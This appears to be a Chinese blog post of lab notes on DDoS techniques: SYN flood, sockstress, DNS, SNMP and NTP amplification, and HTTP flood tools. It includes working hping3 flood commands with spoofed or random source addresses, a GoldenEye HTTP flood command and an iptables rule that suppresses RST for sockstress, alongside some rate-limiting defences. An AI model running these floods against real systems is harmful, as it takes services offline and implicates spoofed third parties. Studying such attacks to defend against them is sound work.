2020-05-14 DDOS攻擊

一、YAN攻擊:

不停的發(fā)送SYN請求連接,服務(wù)器響應(yīng)SYN-ACK的確認(rèn)包,攻擊者沒有返回確認(rèn)包,而是繼續(xù)發(fā)送請求。(只有2次握手)

二、sockstress攻擊實試并寫出攻擊原理

原理:

針對TCP服務(wù)的拒絕服務(wù)攻擊,消耗被攻擊目標(biāo)系統(tǒng)資源 -與攻擊目標(biāo)建立大量socket鏈接,完成三次握手,最后的ACK包window大小為0 (客戶端不接收數(shù)據(jù)) -攻擊者資源消耗?。–PU、內(nèi)存、帶寬)

-異步攻擊,單機(jī)可拒絕服務(wù)高配資源服務(wù)器

-Window窗-實現(xiàn)的TCP流控

sockstress攻擊后

注意,要關(guān)閉RST,防火墻規(guī)則? ? iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 192.168.2.107 -j DROP

mkdir sockstress 新建文件夾

iptables -L?查看綁 RST

防范措施:

限制單位時間內(nèi)每IP建的TCP連接數(shù)

■封殺每30秒與80端口建立連接超過10個的IP地址

■iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --set

■ iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 30 --hitcount 10

-j DROP

■以上規(guī)則對DDoS攻擊無效

三、dns、snmp、ntp?放大攻擊原理

1、DNS放大攻擊原理:

-偽造源地址為被攻擊目標(biāo)地址,向遞歸域名查詢服務(wù)器發(fā)起查詢

-DNS服務(wù)器成為流量放大和實施攻擊者,大量DNS服務(wù)器實現(xiàn)DDoS

2、SNMP放大攻擊原理:

-請求流量小,查詢結(jié)果返回流量大 -結(jié)合偽造源地址實現(xiàn)攻擊

3、NTP放大攻擊原理:

-NTP服務(wù)提monlist (MON_GETLIST)查詢功能

????監(jiān)控NTP服務(wù)器的狀況

-客戶端查詢時,NTP服務(wù)器返回最后同步時間的600個客戶端IP

???每6個IP—個數(shù)據(jù)包,最多100個數(shù)據(jù)包(放大約100倍)

四、應(yīng)用層快速與慢速攻擊測試實驗

慢速攻擊實驗

CC攻擊原理:其實就是刷數(shù)據(jù)庫,數(shù)據(jù)庫在幾秒中之內(nèi)無法處理大量的動態(tài)連接,一旦處理不及時就會導(dǎo)致服務(wù)器崩潰

利用工具

快速攻擊

五、hping3綜合攻擊ip偽造ip實驗

Hping3

-幾乎可以定制發(fā)送任何TCP/IP數(shù)據(jù)包,用于測試FW、端口掃描、性能測試

Syn Flood 攻擊

-hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source? 1.1.1.1

-hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1

-hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 (TCP Flood)

ICMP Flood 攻擊

-hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2

UDP Flood 攻擊

-hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2

--rand-source 用公網(wǎng)隨機(jī)地址進(jìn)行攻擊

-a 1.1.1.1 偽造成1.1.1.1進(jìn)行攻擊

詳細(xì)幫助文檔

hping3 -n -S -d 100 -p 8080 --flood 192.168.2.107 -a 1.1.1.1

hping3 -c 1000 -d 120 -S -w 64 -p 8080 --flood --rand-source 192.168.2.107

六、GoldenEye?7層web測試驗驗

GoldenEye

-http/https拒絕服務(wù)攻擊工具

-安全研究為目的Python腳本

-隨機(jī)攻擊向量,keep-alive,避免緩存命中

goldeneye.py http://1.1.1.1 -w 50 –mrandom??? //-w 50代表50個人 ,-s 500代表每個人500個,50*500打25000個鏈接。

七、ddos防火墻安裝配置并實現(xiàn)防預(yù)

攻擊后被防御

注意:如果沒有防御,檢查一下端口號,再防火墻里添加

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

友情鏈接更多精彩內(nèi)容